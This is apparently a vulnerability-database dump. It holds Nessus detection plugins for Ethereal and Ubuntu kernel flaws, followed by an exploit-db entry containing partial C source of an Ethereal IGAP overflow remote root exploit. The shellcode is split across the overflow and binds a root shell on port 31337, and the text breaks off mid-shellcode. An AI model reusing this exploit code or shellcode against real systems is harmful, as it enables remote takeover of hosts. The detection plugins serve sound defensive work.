script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/FreeBSD/pkg_info\");\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"This plugin has been deprecated. Refer to plugin #38151 (freebsd_pkg_cdf18ed97f4a11d896450020ed76ef5a.nasl) instead.\");\n\nglobal_var cvss_score;\ncvss_score=5;\ninclude('freebsd_package.inc');\n\n\npkg_test(pkg:\"ethereal<0.10.3\");\n\npkg_test(pkg:\"tethereal<0.10.3\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:33:44", "references": [], "pluginID": "20706", "description": "CAN-2004-0176 :\n\nMichael Kerrisk noticed an insufficient permission checking in the shmctl() function. Any process was permitted to lock/unlock any System V shared memory segment that fell within the the RLIMIT_MEMLOCK limit (that is the maximum size of shared memory that unprivileged users can acquire). This allowed am unprivileged user process to unlock locked memory of other processes, thereby allowing them to be swapped out.\nUsually locked shared memory is used to store passphrases and other sensitive content which must not be written to the swap space (where it could be read out even after a reboot).\n\nCAN-2005-0177 :\n\nOGAWA Hirofumi noticed that the table sizes in nls_ascii.c were incorrectly set to 128 instead of 256. This caused a buffer overflow in some cases which could be exploited to crash the kernel.\n\nCAN-2005-0178 :\n\nA race condition was found in the terminal handling of the 'setsid()' function, which is used to start new process sessions.\n\nhttp://oss.sgi.com/archives/netdev/2005-01/msg01036.html :\n\nDavid Coulson noticed a design flaw in the netfilter/iptables module.\nBy sending specially crafted packets, a remote attacker could exploit this to crash the kernel or to bypass firewall rules.\n\nFixing this vulnerability required a change in the Application Binary Interface (ABI) of the kernel. This means that third-party user installed modules might not work any more with the new kernel, so this fixed kernel has a new ABI version number. You have to recompile and reinstall all third-party modules.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "reporter": "Tenable", "published": "2006-01-15T00:00:00", "title": "Ubuntu 4.10 : linux-source-2.6.8.1 vulnerabilities (USN-82-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0176", "CVE-2004-0176", "CVE-2005-0177", "CVE-2005-0178"], "modified": "2016-05-25T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-tree-2.6.8.1", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-5-amd64-k8", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-5", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-5-686", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-5-amd64-k8-smp", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-5-686", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-5-amd64-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-5-686-smp", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-5-amd64-k8", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-5-amd64-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.8.1", "p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.8.1", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-5-386", "cpe:/o:canonical:ubuntu_linux:4.10", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-5-686-smp", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-5-amd64-k8-smp", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-5-386", "p-cpe:/a:canonical:ubuntu_linux:linux-patch-debian-2.6.8.1", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-5-amd64-xeon", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-5-amd64-xeon"], "id": "UBUNTU_USN-82-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=20706", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-82-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20706);\n script_version(\"$Revision: 1.14 $\");\n script_cvs_date(\"$Date: 2016/05/25 16:34:56 $\");\n\n script_cve_id(\"CVE-2004-0176\", \"CVE-2005-0176\", \"CVE-2005-0177\", \"CVE-2005-0178\");\n script_xref(name:\"USN\", value:\"82-1\");\n\n script_name(english:\"Ubuntu 4.10 : linux-source-2.6.8.1 vulnerabilities (USN-82-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CAN-2004-0176 :\n\nMichael Kerrisk noticed an insufficient permission checking in the\nshmctl() function. Any process was permitted to lock/unlock any System\nV shared memory segment that fell within the the RLIMIT_MEMLOCK limit\n(that is the maximum size of shared memory that unprivileged users can\nacquire). This allowed am unprivileged user process to unlock locked\nmemory of other processes, thereby allowing them to be swapped out.\nUsually locked shared memory is used to store passphrases and other\nsensitive content which must not be written to the swap space (where\nit could be read out even after a reboot).\n\nCAN-2005-0177 :\n\nOGAWA Hirofumi noticed that the table sizes in nls_ascii.c were\nincorrectly set to 128 instead of 256. This caused a buffer overflow\nin some cases which could be exploited to crash the kernel.\n\nCAN-2005-0178 :\n\nA race condition was found in the terminal handling of the 'setsid()'\nfunction, which is used to start new process sessions.\n\nhttp://oss.sgi.com/archives/netdev/2005-01/msg01036.html :\n\nDavid Coulson noticed a design flaw in the netfilter/iptables module.\nBy sending specially crafted packets, a remote attacker could exploit\nthis to crash the kernel or to bypass firewall rules.\n\nFixing this vulnerability required a change in the\nApplication Binary Interface (ABI) of the kernel. This means\nthat third-party user installed modules might not work any\nmore with the new kernel, so this fixed kernel has a new ABI\nversion number. You have to recompile and reinstall all\nthird-party modules.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-5-386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-5-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-5-686-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-5-amd64-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-5-amd64-k8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-5-amd64-k8-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-5-amd64-xeon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-5-386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-5-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-5-686-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-5-amd64-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-5-amd64-k8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-5-amd64-k8-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-5-amd64-xeon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-patch-debian-2.6.8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-tree-2.6.8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:4.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/02/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2005-2016 Canonical, Inc. / NASL script (C) 2006-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(4\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 4.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-doc-2.6.8.1\", pkgver:\"2.6.8.1-16.11\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-headers-2.6.8.1-5\", pkgver:\"2.6.8.1-16.11\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-headers-2.6.8.1-5-386\", pkgver:\"2.6.8.1-16.11\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-headers-2.6.8.1-5-686\", pkgver:\"2.6.8.1-16.11\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-headers-2.6.8.1-5-686-smp\", pkgver:\"2.6.8.1-16.11\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-headers-2.6.8.1-5-amd64-generic\", pkgver:\"2.6.8.1-16.11\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-headers-2.6.8.1-5-amd64-k8\", pkgver:\"2.6.8.1-16.11\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-headers-2.6.8.1-5-amd64-k8-smp\", pkgver:\"2.6.8.1-16.11\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-headers-2.6.8.1-5-amd64-xeon\", pkgver:\"2.6.8.1-16.11\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-image-2.6.8.1-5-386\", pkgver:\"2.6.8.1-16.11\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-image-2.6.8.1-5-686\", pkgver:\"2.6.8.1-16.11\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-image-2.6.8.1-5-686-smp\", pkgver:\"2.6.8.1-16.11\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-image-2.6.8.1-5-amd64-generic\", pkgver:\"2.6.8.1-16.11\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-image-2.6.8.1-5-amd64-k8\", pkgver:\"2.6.8.1-16.11\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-image-2.6.8.1-5-amd64-k8-smp\", pkgver:\"2.6.8.1-16.11\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-image-2.6.8.1-5-amd64-xeon\", pkgver:\"2.6.8.1-16.11\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-patch-debian-2.6.8.1\", pkgver:\"2.6.8.1-16.11\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-source-2.6.8.1\", pkgver:\"2.6.8.1-16.11\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-tree-2.6.8.1\", pkgver:\"2.6.8.1-16.11\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-doc-2.6.8.1 / linux-headers-2.6.8.1-5 / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-11-16T04:47:04", "references": ["https://access.redhat.com/security/cve/cve-2004-0176", "https://access.redhat.com/errata/RHSA-2004:136", "https://access.redhat.com/security/cve/cve-2004-1761", "http://ethereal.archive.sunet.se/appnotes/enpa-sa-00013.html", "https://access.redhat.com/security/cve/cve-2004-0367", "https://access.redhat.com/security/cve/cve-2004-0365"], "pluginID": "12482", "description": "Updated Ethereal packages that fix various security vulnerabilities are now available.\n\nEthereal is a program for monitoring network traffic.\n\nStefan Esser reported that Ethereal versions 0.10.1 and earlier contain stack overflows in the IGRP, PGM, Metflow, ISUP, TCAP, or IGAP dissectors. On a system where Ethereal is being run a remote attacker could send malicious packets that could cause Ethereal to crash or execute arbitrary code. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2004-0176 to this issue.\n\nJonathan Heussser discovered that a carefully-crafted RADIUS packet could cause a crash. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2004-0365 to this issue.\n\nEthereal 0.8.13 to 0.10.2 allows remote attackers to cause a denial of service (crash) via a zero-length Presentation protocol selector. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2004-0367 to this issue.\n\nUsers of Ethereal should upgrade to these updated packages, which contain a version of Ethereal that is not vulnerable to these issues.", "edition": 8, "reporter": "Tenable", "published": "2004-07-06T00:00:00", "title": "RHEL 2.1 / 3 : ethereal (RHSA-2004:136)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0367", "CVE-2004-0365", "CVE-2004-0176", "CVE-2004-1761"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:2.1", "p-cpe:/a:redhat:enterprise_linux:ethereal-gnome", "p-cpe:/a:redhat:enterprise_linux:ethereal"], "id": "REDHAT-RHSA-2004-136.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=12482", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2004:136. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(12482);\n script_version (\"1.23\");\n script_cvs_date(\"Date: 2018/11/15 11:40:29\");\n\n script_cve_id(\"CVE-2004-0176\", \"CVE-2004-0365\", \"CVE-2004-0367\", \"CVE-2004-1761\");\n script_xref(name:\"RHSA\", value:\"2004:136\");\n\n script_name(english:\"RHEL 2.1 / 3 : ethereal (RHSA-2004:136)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated Ethereal packages that fix various security vulnerabilities\nare now available.\n\nEthereal is a program for monitoring network traffic.\n\nStefan Esser reported that Ethereal versions 0.10.1 and earlier\ncontain stack overflows in the IGRP, PGM, Metflow, ISUP, TCAP, or IGAP\ndissectors. On a system where Ethereal is being run a remote attacker\ncould send malicious packets that could cause Ethereal to crash or\nexecute arbitrary code. The Common Vulnerabilities and Exposures\nproject (cve.mitre.org) has assigned the name CVE-2004-0176 to this\nissue.\n\nJonathan Heussser discovered that a carefully-crafted RADIUS packet\ncould cause a crash. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2004-0365 to this issue.\n\nEthereal 0.8.13 to 0.10.2 allows remote attackers to cause a denial of\nservice (crash) via a zero-length Presentation protocol selector. The\nCommon Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0367 to this issue.\n\nUsers of Ethereal should upgrade to these updated packages, which\ncontain a version of Ethereal that is not vulnerable to these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0176\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0365\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0367\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-1761\"\n );\n # http://www.ethereal.com/appnotes/enpa-sa-00013.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://ethereal.archive.sunet.se/appnotes/enpa-sa-00013.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2004:136\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ethereal and / or ethereal-gnome packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ethereal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ethereal-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(2\\.1|3)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1 / 3.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2004:136\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"ethereal-0.10.3-0.AS21.1\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"ethereal-gnome-0.10.3-0.AS21.1\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"ethereal-0.10.3-0.30E.1\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"ethereal-gnome-0.10.3-0.30E.1\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ethereal / ethereal-gnome\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T11:51:07", "osvdbidlist": ["6888"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Ethereal 0.10.0-0.10.2 IGAP Overflow Remote Root Exploit. CVE-2004-0176. Remote exploit for linux platform", "reporter": "Abhisek Datta", "published": "2004-03-28T00:00:00", "type": "exploitdb", "title": "Ethereal 0.10.0-0.10.2 IGAP Overflow Remote Root Exploit", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0176"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2004-03-28T00:00:00", "id": "EDB-ID:167", "href": "https://www.exploit-db.com/exploits/167/", "sourceData": "/* \r\n * THE EYE ON SECURITY RESEARCH GROUP - INDIA\r\n * Ethereal IGAP Dissector Message Overflow Remote Root exploit\r\n *\r\n * Copyright 2004 - EOS-India Group\r\n *\r\n * Authors note:\r\n * Shellcode splitting technique:\r\n * Due to difficulty involved while following normal exploitation techniques due to shortage of memory space\r\n * for our shellcode, we used the technique of shellcode splitting. In this technique one part of the shellcode\r\n * is kept before the buffer which overwrites the saved EIP on stack followed by a jmp OFFSET instruction which\r\n * jumps EIP to the second half of the shellcode which is kept after return address. Also since our shellcode \r\n * requires EBP to contain a usuable stack address, we overwrite saved EBP also.\r\n *\r\n * Disclaimer:\r\n * This code is for educational purpose and testing only. The Eye on Security Research Group - India, cannot\r\n * be held responsible for any damage caused due to misuse of this code.\r\n * This code is a proof of concept exploit for a serious vulnerability that exists in Ethereal 0.10.0 to\r\n * Ethereal 0.10.2.\r\n *\r\n * Nilanjan De [n2n+linuxmail.org] - Abhisek Datta [abhisek+front.ru]\r\n * http://www.eos-india.net\r\n *\r\n*/\r\n#define IPPROTO_IGAP\t0x02 // IPPROTO_IGMP=0x02 \t\r\n#define PAYLOAD_SIZE\t(255-64)\t\r\n#define MAX_BUFF\tsizeof(struct igap_header)+sizeof(struct ipheader)\r\n#define EXP\t\t\"Ethereal(v0.10.0-0.10.2) IGAP Dissector Message Overflow Exploit\"\r\n#define VER\t\t\"0.2\"\r\n#define SOCKET_ERROR\t-1\r\n#define MAX_PACKET\t10\r\n#define RETOFFSET \t76 \r\n#define SRC_IP\t\t\"192.31.33.7\"\r\n#include <stdio.h>\r\n#include <signal.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <unistd.h>\r\n#include <signal.h>\r\n#include <netdb.h>\r\n\r\n#define MAX_ARCH\t5\r\nstruct eos{\r\n\tchar *arch;\r\n\tunsigned long ret;\r\n} targets[] = {\r\n\t\"tEthereal(0.10.2)-Gentoo(gdb)\",\r\n\t0xbffede50,\r\n\t//-------------------------------\r\n\t\"tEthereal(0.10.2)-Gentoo \",\r\n\t0xbffede10,\r\n\t//-------------------------------\r\n\t\"Ethereal(0.10.2)-Gentoo \",\r\n\t0xbfffd560,\r\n\t//-------------------------------\r\n\t\"tEthereal(0.10.2)-RedHat 8 \",\r\n\t0xbffedfb8,\r\n\t//-------------------------------\r\n\t\"Ethereal(0.10.2)-RedHat 8 \",\r\n\t0xbfffcd08,\r\n\t//-------------------------------\r\n\tNULL,\r\n\t0\r\n};\r\n\t\r\n\r\n/*\r\n x86 linux portbind a shell in port 31337\r\n based on shellcode from www.shellcode.com.ar\r\n with a few modifications by us\r\n*/\r\n \r\nchar shellcode_firsthalf[]=\r\n /* sys_fork() */\r\n\t\"\\x31\\xc0\" // xorl %eax,%eax\r\n\t\"\\x31\\xdb\" // xorl %ebx,%ebx\r\n\t\"\\xb0\\x02\" // movb $0x2,%al\r\n\t\"\\xcd\\x80\" // int $0x80\r\n\t\"\\x38\\xc3\" // cmpl %ebx,%eax\r\n\t\"\\x74\\x05\" // je 0x5\r\n\t/* sys_exit() */\r\n\t\"\\x8d\\x43\\x01\" // leal 0x1(%ebx),%eax\r\n\t\"\\xcd\\x80\" // int $0x80\r\n /* setuid(0) */\r\n \"\\x31\\xc0\" // xorl %eax,%eax\r\n \"\\x31\\xdb\" // xorl %ebx,%ebx\r\n \"\\xb0\\x17\" // movb $0x17,%al\r\n \"\\xcd\\x80\" // int $0x80\r\n /* socket() */\r\n \"\\x31\\xc0\" // xorl %eax,%eax\r\n \"\\x89\\x45\\x10\" // movl %eax,0x10(%ebp)(IPPROTO_IP = 0x0)\r\n \"\\x40\" // incl %eax\r\n \"\\x89\\xc3\" // movl %eax,%ebx(SYS_SOCKET = 0x1)\r\n \"\\x89\\x45\\x0c\" // movl %eax,0xc(%ebp)(SOCK_STREAM = 0x1)\r\n \"\\x40\" // incl %eax\r\n \"\\x89\\x45\\x08\" // movl %eax,0x8(%ebp)(AF_INET = 0x2)\r\n\t\"\\x8d\\x4d\\x08\" // leal 0x8(%ebp),%ecx\r\n \"\\xb0\\x66\" // movb $0x66,%al\r\n \"\\xcd\\x80\" // int $0x80\r\n \"\\x89\\x45\\x08\" // movl %eax,0x8(%ebp)\r\n\t;\t\r\nchar jumpcode[]=\"\\xeb\\x10\";\r\n\r\nchar shellcode_secondhalf[]=\r\n /* bind()*/\r\n \"\\x43\" // incl %ebx(SYS_BIND = 0x2)\r\n \"\\x66\\x89\\x5d\\x14\" // movw %bx,0x14(%ebp)(AF_INET = 0x2)\r\n\t\"\\x66\\xc7\\x45\\x16\\x7a\\x69\" // movw $0x697a,0x16(%ebp)(port=31337)\r\n \"\\x31\\xd2\" // xorl %edx,%edx\r\n \"\\x89\\x55\\x18\" // movl %edx,0x18(%ebp)\r\n \"\\x8d\\x55\\x14\" // leal 0x14(%ebp),%edx\r\n \"\\x89\\x55\\x0c\" // movl %edx,0xc(%ebp)\r\n \"\\xc6\\x45\\x10\\x10\" // movb $0x10,0x10(%ebp)(sizeof(struct sockaddr) = 10h = 16)\r\n \"\\xb0\\x66\" // movb $0x66,%al\r\n \"\\xcd\\x80\" // int $0x80\r\n \r\n /* listen() */\r\n \"\\x40\" // incl %eax\r\n \"\\x89\\x45\\x0c\" // movl %eax,0xc(%ebp)\r\n \"\\x43\" // incl %ebx\r\n \"\\x43\" // incl %ebx(SYS_LISTEN = 0x4)\r\n \"\\xb0\\x66\" // movb $0x66,%al\r\n \"\\xcd\\x80\" // int $0x80\r\n \r\n /* accept() */\r\n \"\\x43\" // incl %ebx\r\n \"\\x89\\x45\\x0c\" // movl %eax,0xc(%ebp)\r\n \"\\x89\\x45\\x10\" // movl %eax,0x10(%ebp)\r\n \"\\xb0\\x66\" // movb $0x66,%al\r\n \"\\xcd\\x80\" // int $0x80\r\n \"\\x89\\xc3\" // movl %eax,%ebx\r\n \r\n /* dup2() */\r\n 